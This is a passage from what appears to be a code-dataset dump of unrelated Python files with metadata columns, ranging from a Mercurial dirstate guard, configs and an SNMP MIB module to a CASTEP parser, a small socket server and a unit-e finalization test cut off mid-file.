narrowspec,
util,
)
class dirstateguard(util.transactional):
'''Restore dirstate at unexpected failure.
At the construction, this class does:
- write current ``repo.dirstate`` out, and
- save ``.hg/dirstate`` into the backup file
This restores ``.hg/dirstate`` from backup file, if ``release()``
is invoked before ``close()``.
This just removes the backup file at ``close()`` before ``release()``.
'''
def __init__(self, repo, name):
self._repo = repo
self._active = False
self._closed = False
self._backupname = 'dirstate.backup.%s.%d' % (name, id(self))
self._narrowspecbackupname = ('narrowspec.backup.%s.%d' %
(name, id(self)))
repo.dirstate.savebackup(repo.currenttransaction(), self._backupname)
narrowspec.savebackup(repo, self._narrowspecbackupname)
self._active = True
def __del__(self):
if self._active: # still active
# this may occur, even if this class is used correctly:
# for example, releasing other resources like transaction
# may raise exception before ``dirstateguard.release`` in
# ``release(tr, ....)``.
self._abort()
def close(self):
if not self._active: # already inactivated
msg = (_("can't close already inactivated backup: %s")
% self._backupname)
raise error.Abort(msg)
self._repo.dirstate.clearbackup(self._repo.currenttransaction(),
self._backupname)
narrowspec.clearbackup(self._repo, self._narrowspecbackupname)
self._active = False
self._closed = True
def _abort(self):
narrowspec.restorebackup(self._repo, self._narrowspecbackupname)
self._repo.dirstate.restorebackup(self._repo.currenttransaction(),
self._backupname)
self._active = False
def release(self):
if not self._closed:
if not self._active: # already inactivated
msg = (_("can't release already inactivated backup: %s")
% self._backupname)
raise error.Abort(msg)
self._abort()
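# --- editor's note: illustrative usage (assumes an existing `repo` object;
# this sketch is not part of mercurial itself) ---
# guard = dirstateguard(repo, 'mytask')
# try:
#     ...              # mutate the dirstate
#     guard.close()    # success path: discard the backup
# finally:
#     guard.release()  # if close() was never reached, restore from the backup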
| 34.736842
| 77
| 0.610227
| 2,260
| 0.856061
| 0
| 0
| 0
| 0
| 0
| 0
| 1,014
| 0.384091
|
fbe71debd90d8d660d1121d1807a3090d9eabd7b
| 2,061
|
py
|
Python
|
config.py
|
mF2C/UserManagement
|
0a44f8fbf86a140156da2f87a25490345f296cbb
|
[
"Apache-2.0"
] | null | null | null |
config.py
|
mF2C/UserManagement
|
0a44f8fbf86a140156da2f87a25490345f296cbb
|
[
"Apache-2.0"
] | 12
|
2017-10-25T08:05:32.000Z
|
2019-11-13T14:29:42.000Z
|
config.py
|
mF2C/UserManagement
|
0a44f8fbf86a140156da2f87a25490345f296cbb
|
[
"Apache-2.0"
] | 1
|
2017-10-24T10:13:55.000Z
|
2017-10-24T10:13:55.000Z
|
"""
CONFIGURATION FILE
This is being developed for the MF2C Project: http://www.mf2c-project.eu/
Copyright: Roi Sucasas Font, Atos Research and Innovation, 2017.
This code is licensed under an Apache 2.0 license. Please, refer to the LICENSE.TXT file for more information
Created on 18 oct. 2018
@author: Roi Sucasas - ATOS
"""
#!/usr/bin/python
dic = { "VERSION": "1.3.10",
# USER MANAGEMENT MODULE MODE: "DEFAULT", "MF2C" , "STANDALONE"
"UM_MODE": "MF2C",
# CIMI
"CIMI_URL": "http://cimi:8201/api",
"DEVICE_USER": "rsucasas",
# SERVER - REST API
"SERVER_PORT": 46300,
"HOST_IP": "localhost",
"API_DOC_URL": "/api/v2/um",
# working dir: "C://TMP/tmp/mf2c/um/" "/tmp/mf2c/um/"
"UM_WORKING_DIR_VOLUME": "/tmp/mf2c/um/",
# db
"DB_SHARING_MODEL": "dbt1",
"DB_USER_PROFILE": "dbt2",
# VERIFY_SSL controls whether we verify the server's TLS certificate or not
"VERIFY_SSL": False,
# for testing the interaction with the lifecycle management
"ENABLE_ASSESSMENT": True,
# CIMI RESOURCES managed by this component
"CIMI_PROFILES": "user-profile",
"CIMI_SHARING_MODELS": "sharing-model",
"SERVICE_CONSUMER": True,
"RESOURCE_CONTRIBUTOR": True,
"MAX_APPS": 2,
"BATTERY_LIMIT": 50,
"GPS_ALLOWED": True,
"MAX_CPU_USAGE": 50,
"MAX_MEM_USAGE": 50,
"MAX_STO_USAGE": 50,
"MAX_BANDWITH_USAGE": 50,
# URLs / ports from other components:
# LIFECYCLE
"URL_PM_LIFECYCLE": "http://lifecycle:46000/api/v2/lm"
}
# APPS RUNNING
APPS_RUNNING = 0
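# --- editor's note: illustrative consumer code (hypothetical) ---
# from config import dic
# port = dic["SERVER_PORT"]  # 46300
# base_url = "http://{}:{}{}".format(dic["HOST_IP"], port, dic["API_DOC_URL"])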
| 32.714286
| 109
| 0.501698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,255
| 0.608928
|
fbe8a390825becc2ff9eab5332457693f2473fbc
| 3,606
|
py
|
Python
|
pysnmp-with-texts/IANA-MALLOC-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 8
|
2019-05-09T17:04:00.000Z
|
2021-06-09T06:50:51.000Z
|
pysnmp-with-texts/IANA-MALLOC-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 4
|
2019-05-31T16:42:59.000Z
|
2020-01-31T21:57:17.000Z
|
pysnmp-with-texts/IANA-MALLOC-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module IANA-MALLOC-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/IANA-MALLOC-MIB
# Produced by pysmi-0.3.4 at Wed May 1 13:50:25 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, ObjectIdentifier, OctetString = mibBuilder.importSymbols("ASN1", "Integer", "ObjectIdentifier", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ConstraintsUnion, ValueSizeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ConstraintsUnion", "ValueSizeConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Integer32, iso, MibScalar, MibTable, MibTableRow, MibTableColumn, MibIdentifier, NotificationType, TimeTicks, mib_2, ObjectIdentity, Bits, Counter64, Gauge32, Unsigned32, ModuleIdentity, Counter32, IpAddress = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "MibIdentifier", "NotificationType", "TimeTicks", "mib-2", "ObjectIdentity", "Bits", "Counter64", "Gauge32", "Unsigned32", "ModuleIdentity", "Counter32", "IpAddress")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
ianaMallocMIB = ModuleIdentity((1, 3, 6, 1, 2, 1, 102))
ianaMallocMIB.setRevisions(('2014-05-22 00:00', '2003-01-27 12:00',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
if mibBuilder.loadTexts: ianaMallocMIB.setRevisionsDescriptions(('Updated contact info.', 'Initial version.',))
if mibBuilder.loadTexts: ianaMallocMIB.setLastUpdated('201405220000Z')
if mibBuilder.loadTexts: ianaMallocMIB.setOrganization('IANA')
if mibBuilder.loadTexts: ianaMallocMIB.setContactInfo(' Internet Assigned Numbers Authority Internet Corporation for Assigned Names and Numbers 12025 Waterfront Drive, Suite 300 Los Angeles, CA 90094-2536 Phone: +1 310-301-5800 EMail: iana&iana.org')
if mibBuilder.loadTexts: ianaMallocMIB.setDescription('This MIB module defines the IANAscopeSource and IANAmallocRangeSource textual conventions for use in MIBs which need to identify ways of learning multicast scope and range information. Any additions or changes to the contents of this MIB module require either publication of an RFC, or Designated Expert Review as defined in the Guidelines for Writing IANA Considerations Section document. The Designated Expert will be selected by the IESG Area Director(s) of the Transport Area.')
class IANAscopeSource(TextualConvention, Integer32):
description = 'The source of multicast scope information.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))
namedValues = NamedValues(("other", 1), ("manual", 2), ("local", 3), ("mzap", 4), ("madcap", 5))
class IANAmallocRangeSource(TextualConvention, Integer32):
description = 'The source of multicast address allocation range information.'
status = 'current'
subtypeSpec = Integer32.subtypeSpec + ConstraintsUnion(SingleValueConstraint(1, 2, 3))
namedValues = NamedValues(("other", 1), ("manual", 2), ("local", 3))
mibBuilder.exportSymbols("IANA-MALLOC-MIB", IANAmallocRangeSource=IANAmallocRangeSource, IANAscopeSource=IANAscopeSource, ianaMallocMIB=ianaMallocMIB, PYSNMP_MODULE_ID=ianaMallocMIB)
| 100.166667
| 537
| 0.781475
| 663
| 0.18386
| 0
| 0
| 0
| 0
| 0
| 0
| 1,836
| 0.509151
|
fbe96376f6c7e8ea5a7177b454718260bda00d58
| 112
|
py
|
Python
|
api/base/views/__init__.py
|
simpsonw/atmosphere
|
3a5203ef0b563de3a0e8c8c8715df88186532d7a
|
[
"BSD-3-Clause"
] | 197
|
2016-12-08T02:33:32.000Z
|
2022-03-23T14:27:47.000Z
|
api/base/views/__init__.py
|
simpsonw/atmosphere
|
3a5203ef0b563de3a0e8c8c8715df88186532d7a
|
[
"BSD-3-Clause"
] | 385
|
2017-01-03T22:51:46.000Z
|
2020-12-16T16:20:42.000Z
|
api/base/views/__init__.py
|
benlazarine/atmosphere
|
38fad8e4002e510e8b4294f2bb5bc75e8e1817fa
|
[
"BSD-3-Clause"
] | 50
|
2016-12-08T08:32:25.000Z
|
2021-12-10T00:21:39.000Z
|
from .version import VersionViewSet, DeployVersionViewSet
__all__ = ["VersionViewSet", "DeployVersionViewSet"]
| 28
| 57
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 38
| 0.339286
|
fbed4a160c462e80695d00929515e53d559a44ef
| 455
|
py
|
Python
|
amaranth/vendor/xilinx_spartan_3_6.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 528
|
2020-01-28T18:21:00.000Z
|
2021-12-09T06:27:51.000Z
|
amaranth/vendor/xilinx_spartan_3_6.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 360
|
2020-01-28T18:34:30.000Z
|
2021-12-10T08:03:32.000Z
|
amaranth/vendor/xilinx_spartan_3_6.py
|
psumesh/nmigen
|
7d611b8fc1d9e58853ff268ec38ff8f4131a9774
|
[
"BSD-2-Clause"
] | 100
|
2020-02-06T21:55:46.000Z
|
2021-11-25T19:20:44.000Z
|
import warnings
from .xilinx import XilinxPlatform
__all__ = ["XilinxSpartan3APlatform", "XilinxSpartan6Platform"]
XilinxSpartan3APlatform = XilinxPlatform
XilinxSpartan6Platform = XilinxPlatform
# TODO(amaranth-0.4): remove
warnings.warn("instead of amaranth.vendor.xilinx_spartan_3_6.XilinxSpartan3APlatform and "
".XilinxSpartan6Platform, use amaranth.vendor.xilinx.XilinxPlatform",
DeprecationWarning, stacklevel=2)
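# --- editor's note: the replacement import spelled out by the warning above ---
# from amaranth.vendor.xilinx import XilinxPlatform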
| 26.764706
| 90
| 0.782418
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 221
| 0.485714
|
fbee0d4e9115c00d9a52094547d27c43033ebffb
| 2,968
|
py
|
Python
|
spatialtis/_plotting/api/community_map.py
|
Mr-Milk/SpatialTis
|
bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6
|
[
"Apache-2.0"
] | 10
|
2020-07-14T13:27:35.000Z
|
2021-11-24T21:41:30.000Z
|
spatialtis/_plotting/api/community_map.py
|
Mr-Milk/SpatialTis
|
bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6
|
[
"Apache-2.0"
] | 21
|
2021-01-10T09:39:25.000Z
|
2022-03-12T01:04:52.000Z
|
spatialtis/_plotting/api/community_map.py
|
Mr-Milk/SpatialTis
|
bcdc6df5213b8b256cbe4c9a7c0f3b5e6d3c56b6
|
[
"Apache-2.0"
] | null | null | null |
from ast import literal_eval
from collections import Counter
from typing import Dict, Optional
from anndata import AnnData
from spatialtis.config import Config, analysis_list
from ...utils import doc
from ..base import graph_position_interactive, graph_position_static
from .utils import query_df
@doc
def community_map(
data: AnnData,
roi: Dict,
min_cells: int = 10,
use: str = "static",
community_key: Optional[str] = None,
centroid_key: Optional[str] = None,
neighbors_key: Optional[str] = None,
**plot_options,
):
"""Visualize cell communities in ROI
Args:
data: {adata_plotting}
roi: {roi}
min_cells: Show communities contain more than a number of cells
use: "static" or "interactive" (Default: "static")
community_key: {community_key}
centroid_key: {centroid_key}
neighbors_key: {neighbors_key}
**plot_options: Pass to :class:`spatialtis._plotting.base.graph_position_static` or
:class:`spatialtis._plotting.base.graph_position_interactive`
{pyecharts_tips}
"""
if community_key is None:
community_key = analysis_list["cell_community"].last_used_key
if centroid_key is None:
centroid_key = Config.centroid_key
if neighbors_key is None:
neighbors_key = Config.NEIGHBORS_KEY
df = query_df(data.obs, roi)
nodes_types = df[community_key].tolist()
commus = []
for commu, count in Counter(nodes_types).items():
if count >= min_cells:
commus.append(commu)
df = df.reset_index(drop=True)
xdf = df[df[community_key].isin(commus)]
xdf = xdf.reset_index()
if len(xdf) == 0:
raise ValueError("Seems like there is no cells left to be drawn")
need_eval_nodes = isinstance(xdf[centroid_key][0], str)
need_eval_neighs = isinstance(xdf[neighbors_key][0], str)
if need_eval_nodes:
nodes = [literal_eval(n) for n in xdf[centroid_key]]
else:
nodes = [n for n in xdf[centroid_key]]
if need_eval_neighs:
neighs = [literal_eval(n) for n in xdf[neighbors_key]]
else:
neighs = [n for n in xdf[neighbors_key]]
nodes_types = xdf[community_key]
edges = []
edges_types = []
for i, n in zip(xdf.index, neighs):
for x in n:
new_x = xdf[xdf["index"] == x].index
if len(new_x) == 1:
new_x = new_x[0]
if nodes_types[i] == nodes_types[new_x]:
edges.append((i, new_x))
edges_types.append(nodes_types[i])
plot_options["saved_name"] = "community_map_" + ",".join(
[f"{k}={v}" for k, v in roi.items()]
)
if use == "interactive":
return graph_position_interactive(
nodes, edges, edges_types=edges_types, **plot_options
)
else:
return graph_position_static(
nodes, edges, edges_types=edges_types, **plot_options
)
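# --- editor's note: illustrative call (hypothetical AnnData object and ROI
# column/value pair) ---
# community_map(data, roi={"ROI": "ROI_1"}, min_cells=10, use="static")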
| 31.242105
| 91
| 0.637466
| 0
| 0
| 0
| 0
| 2,665
| 0.897911
| 0
| 0
| 672
| 0.226415
|
fbef292579d80d2de80ed4ab24cb1a2133c269b6
| 7,209
|
py
|
Python
|
pynics/binparse/castep_bin_results.py
|
ThatPerson/pynics
|
ae9dd58fa4353c4907f6fd7d6ad368029a4288f1
|
[
"MIT"
] | 2
|
2019-10-03T21:18:17.000Z
|
2019-10-05T13:08:36.000Z
|
pynics/binparse/castep_bin_results.py
|
ThatPerson/pynics
|
ae9dd58fa4353c4907f6fd7d6ad368029a4288f1
|
[
"MIT"
] | 2
|
2021-06-25T15:11:27.000Z
|
2021-10-04T13:23:04.000Z
|
pynics/binparse/castep_bin_results.py
|
ThatPerson/pynics
|
ae9dd58fa4353c4907f6fd7d6ad368029a4288f1
|
[
"MIT"
] | 1
|
2021-06-25T14:32:07.000Z
|
2021-06-25T14:32:07.000Z
|
# Python 2-to-3 compatibility code
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import collections
from pynics.binparse.forbinfile import RecordError
def cbin_results_parse(binfile, results_store, curr_version, params,
current_cell, tolerant=False):
# First, parse the elec results part (always present)
results_store['elec'] = collections.OrderedDict()
cbin_elec_parse(binfile, results_store[
'elec'], curr_version, params, current_cell)
# Then go for the optional stuff
cbin_optional_parse(binfile, results_store, curr_version)
def cbin_elec_parse(binfile, elec_store, curr_version, params, current_cell):
    # A few pieces of information are stored
elec_store['found_ground_state_wvfn'] = not (
binfile.read_record('i')[0] == 0) # Logical value
elec_store['found_ground_state_den'] = not (
binfile.read_record('i')[0] == 0) # Logical value
elec_store['total_energy'] = binfile.read_record('d')[0]
elec_store['fermi_energy'] = binfile.read_record('d')
# Fermi energy for both spins if we have two. This relies on param being
# already parsed
if params['nspins'] == 2:
elec_store['fermi_energy'] = (elec_store['fermi_energy'][
0], elec_store['fermi_energy'][0])
elec_store['wvfn_nbands'], elec_store[
'wvfn_nspins'] = binfile.read_record('i')
# Read occupation eigenvalues for the Kohn-Sham states. This relies on
# cell being already parsed
elec_store['occupation'] = {}
for kp_i in range(0, current_cell['nkpts']):
kp = binfile.read_record('d')
elec_store['occupation'][kp] = {'occ': [], 'nrg': []}
for ns_i in range(0, elec_store['wvfn_nspins']):
elec_store['occupation'][kp]['occ'].append(
binfile.read_record('d')) # Occupation
elec_store['occupation'][kp]['nrg'].append(
binfile.read_record('d')) # Energies
# Why is this here again? Whatever.
elec_store['found_ground_state_den'] = not (
binfile.read_record('i')[0] == 0) # Logical value
# Read the fine grid size, keep the information because it is of use for
# various other parsing operations
elec_store['model_ngx_fine'], elec_store['model_ngy_fine'], elec_store[
'model_ngz_fine'] = binfile.read_record('i')
# Finally, dummy read of density
for n in range(0, elec_store['model_ngx_fine'] *
elec_store['model_ngy_fine']):
dummy_int = binfile.read_record('i')
def cbin_optional_parse(binfile, results_store, curr_version, tolerant=False):
    if (tolerant):  # In this case, unknown sections will simply be ignored
        def skip_optional():
            # Read ahead until the next alphabetic section header, then rewind
            while True:
                header = binfile.read_string_record()
                if header.isalpha():
                    binfile.backspace()
                    break
try:
while True:
header = binfile.read_string_record()
if (header == 'END'):
break
try:
castep_bin_olist[header](binfile, results_store, curr_version)
except KeyError:
if (tolerant):
print("Skipping unrecognized header " + header)
skip_optional()
else:
# The default case, doesn't account for forward
# compatibility for now
raise CastepBinError('Unknown optional section found')
except RecordError:
raise CastepBinError(
'End of file reached while parsing optional blocks')
# Utility routine
def tensor_reshape(V):
return tuple([
tuple([
tuple([V[i+j+k] for i in range(0, 3)
]) for j in range(0, 9, 3)
]) for k in range(0, len(V), 9)])
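# Worked example (editor's note): for one flat 9-element record,
# tensor_reshape(list(range(1, 10))) == (((1, 2, 3), (4, 5, 6), (7, 8, 9)),)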
def opt_e_fermi_parse(binfile, results_store, curr_version):
# Parse Fermi energy for second spin
efermi_2 = binfile.read_record('d')[0]
results_store['elec']['fermi_energy'] = (
results_store['elec']['fermi_energy'][0], efermi_2)
def opt_oep_pot_parse(binfile, results_store, curr_version):
# Parse optimized effective potential
results_store['oep_pot'] = {}
results_store['oep_pot']['found_oep_ground_state'] = not (
binfile.read_record('i') == 0)
results_store['oep_pot']['oep_energy_difference'] = (binfile
.read_record('d')[0])
# We need nspins, we get it indirectly
nspins = len(results_store['elec']['fermi_energy'])
ngx_fine = results_store['elec']['model_ngx_fine']
ngy_fine = results_store['elec']['model_ngy_fine']
ngz_fine = results_store['elec']['model_ngz_fine']
    # Sort of necessary to initialize here. Build independent inner lists:
    # [[...]]*n would alias every grid point to the same list, so the
    # per-spin assignments below would overwrite all grid points at once.
    results_store['oep_pot']['pot_fine'] = [
        [0.0 for s in range(0, nspins)]
        for _ in range(ngx_fine * ngy_fine * ngz_fine)]
for s_i in range(0, nspins):
for nx1 in range(0, ngx_fine):
for ny1 in range(0, ngy_fine):
nx, ny, grid_charge_r, grid_charge_im = binfile.read_record(
'iidd')
# Fortran convention needs to be used
for nz in range(1, ngz_fine+1):
# Back to Python convention, arrays count from 0
igrid = (nx-1)+(ny-1)*ngx_fine+(nz-1)*ngx_fine*ngy_fine
results_store['oep_pot']['pot_fine'][igrid][
s_i] = (grid_charge_r, grid_charge_im)
def opt_de_dloge_parse(binfile, results_store, curr_version):
# Parse energy logarithmic derivative
results_store['de_dloge'] = binfile.read_record('d')[0]
def opt_forces_parse(binfile, results_store, curr_version):
# Parse forces
f = binfile.read_record('d')
# Reshape
results_store['forces'] = tuple(
[tuple([f[i+j] for i in range(0, 3)]) for j in range(0, len(f), 3)])
def opt_stress_parse(binfile, results_store, curr_version):
# Parse stress & strain tensors
results_store['stress'] = {}
stress = binfile.read_record('d')
strain = binfile.read_record('d')
results_store['stress']['stress'] = stress
results_store['stress']['strain'] = tensor_reshape(strain)
def opt_shielding_parse(binfile, results_store, curr_version):
# Parse NMR shieldings
results_store['shielding'] = {}
results_store['shielding']['ms'] = binfile.read_record('d')
results_store['shielding']['sus'] = binfile.read_record('d')
# Reshape ms as a list of tensors
results_store['shielding']['ms'] = tensor_reshape(
results_store['shielding']['ms'])
def opt_efg_parse(binfile, results_store, curr_version):
results_store['efg'] = binfile.read_record('d')
results_store['efg'] = tensor_reshape(results_store['efg'])
castep_bin_olist = {
'E_FERMI': opt_e_fermi_parse,
'OEP_POT': opt_oep_pot_parse,
'DE_DLOGE': opt_de_dloge_parse,
'FORCES': opt_forces_parse,
'STRESS': opt_stress_parse,
'SHIELDING': opt_shielding_parse,
'EFG': opt_efg_parse,
}
| 34.826087
| 78
| 0.629768
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,085
| 0.289222
|
fbef307f38bef0fc49bdcc1050b0a7022b885117
| 1,084
|
py
|
Python
|
epi-poc-demo/node-b/node-b.py
|
onnovalkering/epif-poc
|
0fac10ce59037fbf8725f09808813dbab71ff70a
|
[
"Apache-2.0"
] | null | null | null |
epi-poc-demo/node-b/node-b.py
|
onnovalkering/epif-poc
|
0fac10ce59037fbf8725f09808813dbab71ff70a
|
[
"Apache-2.0"
] | null | null | null |
epi-poc-demo/node-b/node-b.py
|
onnovalkering/epif-poc
|
0fac10ce59037fbf8725f09808813dbab71ff70a
|
[
"Apache-2.0"
] | null | null | null |
import os
import socket
import threading
HEADER = 64
PORT = 5053
FW = "192.168.101.2"
ADDR = (FW, PORT)
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[FIREWALL CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == DISCONNECT_MESSAGE:
connected = False
print(f"[{addr}] {msg}")
conn.send("Msg received".encode(FORMAT))
conn.close()
def start():
server.listen()
print(f"[LISTENING] firewall is running on {FW}")
while True:
conn, addr = server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNECTIONS] {threading.activeCount() - 1}")
print("[STARTING] server is starting...")
start()
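# --- editor's sketch: a matching client for the length-prefixed protocol above
# (shown for reference only; in practice this lives in a separate script and
# assumes the host/port are reachable) ---
def send_message(msg, addr=(FW, PORT)):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(addr)
    data = msg.encode(FORMAT)
    # 64-byte space-padded ASCII length header, then the payload
    header = str(len(data)).encode(FORMAT)
    header += b' ' * (HEADER - len(header))
    client.send(header)
    client.send(data)
    print(client.recv(2048).decode(FORMAT))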
| 23.565217
| 74
| 0.628229
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 237
| 0.218635
|
fbef8b98b95a0bd508e97ef365acd9e2c1cbd2ce
| 652
|
py
|
Python
|
sliding_window/equal_substring.py
|
sleebapaul/codeforces
|
50c8bff0b36e6ce7e8f89c7c827ae8845f80098e
|
[
"MIT"
] | null | null | null |
sliding_window/equal_substring.py
|
sleebapaul/codeforces
|
50c8bff0b36e6ce7e8f89c7c827ae8845f80098e
|
[
"MIT"
] | null | null | null |
sliding_window/equal_substring.py
|
sleebapaul/codeforces
|
50c8bff0b36e6ce7e8f89c7c827ae8845f80098e
|
[
"MIT"
] | null | null | null |
"""
1208. Get Equal Substrings Within Budget
Straightforward sliding window. The problem asks for the max length, so track the running maximum as the window grows.
"""
class Solution:
def equalSubstring(self, s: str, t: str, maxCost: int) -> int:
cost = 0
window_start = 0
result = 0
for window_end in range(len(s)):
cost += abs(ord(s[window_end]) - ord(t[window_end]))
if cost > maxCost:
cost -= abs(ord(s[window_start]) - ord(t[window_start]))
window_start += 1
result = max(result, window_end - window_start+1)
return result
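# Worked example (editor's note):
# Solution().equalSubstring("abcd", "bcdf", 3) -> 3
# per-index costs are |a-b|=1, |b-c|=1, |c-d|=1, |d-f|=2; the longest window
# whose total cost stays within 3 has length 3 ("abc" -> "bcd").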
| 27.166667
| 72
| 0.518405
| 534
| 0.819018
| 0
| 0
| 0
| 0
| 0
| 0
| 115
| 0.17638
|
fbef9d38a58cfa2a1c22c680025cec376e6993bf
| 13,836
|
py
|
Python
|
test/functional/esperanza_withdraw.py
|
frolosofsky/unit-e
|
d3d12508b915986841bd19c4dee9e50dd662a112
|
[
"MIT"
] | null | null | null |
test/functional/esperanza_withdraw.py
|
frolosofsky/unit-e
|
d3d12508b915986841bd19c4dee9e50dd662a112
|
[
"MIT"
] | null | null | null |
test/functional/esperanza_withdraw.py
|
frolosofsky/unit-e
|
d3d12508b915986841bd19c4dee9e50dd662a112
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) 2018-2019 The Unit-e developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.test_framework import UnitETestFramework
from test_framework.util import (
json,
connect_nodes,
disconnect_nodes,
assert_equal,
assert_finalizationstate,
assert_raises_rpc_error,
sync_blocks,
wait_until,
)
from decimal import Decimal
import time
LOGOUT_DYNASTY_DELAY = 3
WITHDRAW_EPOCH_DELAY = 12
class EsperanzaWithdrawTest(UnitETestFramework):
def set_test_params(self):
self.num_nodes = 3
esperanza_config = {
'dynastyLogoutDelay': LOGOUT_DYNASTY_DELAY,
'withdrawalEpochDelay': WITHDRAW_EPOCH_DELAY
}
json_params = json.dumps(esperanza_config)
finalizer_node_params = ['-esperanzaconfig=' + json_params, '-validating=1']
proposer_node_params = ['-esperanzaconfig=' + json_params]
self.extra_args = [
proposer_node_params,
finalizer_node_params,
finalizer_node_params,
]
self.setup_clean_chain = True
# create topology where arrows denote non-persistent connection
# finalizer1 → proposer ← finalizer2
def setup_network(self):
self.setup_nodes()
proposer = self.nodes[0]
finalizer1 = self.nodes[1]
finalizer2 = self.nodes[2]
connect_nodes(finalizer1, proposer.index)
connect_nodes(finalizer2, proposer.index)
def run_test(self):
proposer = self.nodes[0]
finalizer1 = self.nodes[1]
finalizer2 = self.nodes[2]
self.setup_stake_coins(*self.nodes)
# Leave IBD
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
sync_blocks([proposer, finalizer1, finalizer2], timeout=10)
finalizer1_address = finalizer1.getnewaddress('', 'legacy')
# create deposits
# F
# e0 - e1
# d1
# d2
d1 = finalizer1.deposit(finalizer1_address, 1500)
d2 = finalizer2.deposit(finalizer2.getnewaddress('', 'legacy'), 1500)
self.wait_for_transaction(d1, timeout=10)
self.wait_for_transaction(d2, timeout=10)
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
sync_blocks([proposer, finalizer1, finalizer2], timeout=10)
disconnect_nodes(finalizer1, proposer.index)
disconnect_nodes(finalizer2, proposer.index)
assert_equal(proposer.getblockcount(), 2)
assert_finalizationstate(proposer, {'currentDynasty': 0,
'currentEpoch': 1,
'lastJustifiedEpoch': 0,
'lastFinalizedEpoch': 0,
'validators': 0})
self.log.info('deposits are created')
# Generate enough blocks to activate deposits
# F F F F J
# e0 - e1 - e2 - e3 - e4 - e5 - e6[26]
# d1
# d2
proposer.generatetoaddress(3 + 5 + 5 + 5 + 5, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 25)
assert_finalizationstate(proposer, {'currentDynasty': 2,
'currentEpoch': 5,
'lastJustifiedEpoch': 4,
'lastFinalizedEpoch': 3,
'validators': 0})
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 26)
assert_finalizationstate(proposer, {'currentDynasty': 3,
'currentEpoch': 6,
'lastJustifiedEpoch': 4,
'lastFinalizedEpoch': 3,
'validators': 2})
self.log.info('finalizers are created')
# Logout finalizer1
# F F F F J
# e0 - e1 - e2 - e3 - e4 - e5 - e6[26]
# d1 l1
# d2
self.wait_for_vote_and_disconnect(finalizer=finalizer1, node=proposer)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
# TODO UNIT-E: logout tx can't be created if its vote is not in the block
# we should check that input of logout tx is in the mempool too
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
connect_nodes(finalizer1, proposer.index)
sync_blocks([finalizer1, proposer], timeout=10)
l1 = finalizer1.logout()
wait_until(lambda: l1 in proposer.getrawmempool(), timeout=10)
disconnect_nodes(finalizer1, proposer.index)
proposer.generatetoaddress(3, proposer.getnewaddress('', 'bech32'))
assert_equal(proposer.getblockcount(), 30)
assert_finalizationstate(proposer, {'currentDynasty': 3,
'currentEpoch': 6,
'lastJustifiedEpoch': 5,
'lastFinalizedEpoch': 4,
'validators': 2})
self.log.info('finalizer1 logged out in dynasty=3')
# During LOGOUT_DYNASTY_DELAY both finalizers can vote.
# Since the finalization happens at every epoch,
# number of dynasties is equal to number of epochs.
for _ in range(LOGOUT_DYNASTY_DELAY):
proposer.generatetoaddress(1, proposer.getnewaddress('', 'bech32'))
self.wait_for_vote_and_disconnect(finalizer=finalizer1, node=proposer)
self.wait_for_vote_and_disconnect(finalizer=finalizer2, node=proposer)
